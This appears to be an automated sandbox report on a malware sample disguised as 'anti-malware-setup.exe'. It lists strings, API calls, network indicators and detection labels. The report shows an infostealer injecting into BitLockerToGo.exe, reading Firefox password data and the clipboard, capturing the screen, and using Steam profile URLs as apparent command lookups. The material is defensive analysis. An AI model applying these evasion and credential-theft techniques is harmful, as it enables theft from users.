              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/workshop/
              Source: BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.st1T
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampower
              Source: BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
              Source: BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/about/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/explore/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/legal/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/mobile
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/news/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/points/shop/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcnT
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknown | Network traffic detected: HTTP traffic on port 62001 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 62024 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknown | Network traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 62017 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62001
              Source: unknown | Network traffic detected: HTTP traffic on port 61984 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62024
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61984
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62017
              Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49770 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49780 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49787 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49796 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49805 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:61984 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:62001 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:62017 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:62024 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00431AA0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00431AA0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00431C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt

              System Summary

              Source: 00000000.00000002.2322019566.000000000213A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: C:\Users\user\Desktop\anti-malware-setup.exeCode function: 0_2_00CFBD40 DuplicateHandle,GetCurrentThreadId,CreateWaitableTimerExW,CreateWaitableTimerExW,NtCreateWaitCompletionPacket,VirtualQuery,0_2_00CFBD40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004369803_2_00436980
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043E2B03_2_0043E2B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00436C903_2_00436C90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00409D393_2_00409D39
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004085E03_2_004085E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004165E43_2_004165E4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040D5FD3_2_0040D5FD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004206D03_2_004206D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004106983_2_00410698
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040AF593_2_0040AF59
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042AF243_2_0042AF24
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004227F63_2_004227F6
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041C8503_2_0041C850
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042A8553_2_0042A855
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042E85A3_2_0042E85A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042F0693_2_0042F069
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042406D3_2_0042406D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004258C03_2_004258C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004110E03_2_004110E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004330EE3_2_004330EE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041508C3_2_0041508C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043D0903_2_0043D090
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004198A03_2_004198A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040F8A63_2_0040F8A6
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004310AA3_2_004310AA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004218B73_2_004218B7
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043D1403_2_0043D140
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041695C3_2_0041695C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004361603_2_00436160
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004039703_2_00403970
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004271003_2_00427100
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004161063_2_00416106
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004379103_2_00437910
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043D1D03_2_0043D1D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041D1E03_2_0041D1E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040D9ED3_2_0040D9ED
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004299F03_2_004299F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004059803_2_00405980
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040AA403_2_0040AA40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004062703_2_00406270
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042420E3_2_0042420E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004212203_2_00421220
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004302E13_2_004302E1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004282FF3_2_004282FF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004382923_2_00438292
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004232903_2_00423290
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00424AB03_2_00424AB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042E3483_2_0042E348
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041E3603_2_0041E360
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040CB053_2_0040CB05
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00426B093_2_00426B09
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042FB103_2_0042FB10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042631D3_2_0042631D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004043203_2_00404320
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00414BFF3_2_00414BFF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00402BA03_2_00402BA0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00411BB03_2_00411BB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041FC403_2_0041FC40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00404C503_2_00404C50
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041CC603_2_0041CC60
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004234703_2_00423470
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043DC103_2_0043DC10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041B4273_2_0041B427
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004374D03_2_004374D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004074E03_2_004074E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042B4E13_2_0042B4E1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004265783_2_00426578
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00445D2A3_2_00445D2A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00413DC03_2_00413DC0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004095F03_2_004095F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041C5803_2_0041C580
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042D65C3_2_0042D65C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004316003_2_00431600
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00421E043_2_00421E04
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004146203_2_00414620
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00405ED03_2_00405ED0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00408EE03_2_00408EE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041AE873_2_0041AE87
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004246903_2_00424690
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041BE9F3_2_0041BE9F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00402F403_2_00402F40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042A7423_2_0042A742
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004067003_2_00406700
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00422F303_2_00422F30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043DF303_2_0043DF30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043CF303_2_0043CF30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043C7C43_2_0043C7C4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043A7E03_2_0043A7E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004247A43_2_004247A4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042A7AD3_2_0042A7AD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041CFB03_2_0041CFB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004187B03_2_004187B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042A7BC3_2_0042A7BC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00408040 appears 52 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00413DB0 appears 77 times
              Source: anti-malware-setup.exe, 00000000.00000002.2322019566.0000000002100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs anti-malware-setup.exe
              Source: anti-malware-setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.2322019566.000000000213A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@13/2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00436C90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_00436C90
              Source: anti-malware-setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\anti-malware-setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: BitLockerToGo.exe, 00000003.00000003.2358199369.0000000005AA6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2358480602.0000000005A89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: anti-malware-setup.exeVirustotal: Detection: 72%
              Source: anti-malware-setup.exeReversingLabs: Detection: 71%
              Source: unknownProcess created: C:\Users\user\Desktop\anti-malware-setup.exe "C:\Users\user\Desktop\anti-malware-setup.exe"
              Source: C:\Users\user\Desktop\anti-malware-setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Users\user\Desktop\anti-malware-setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
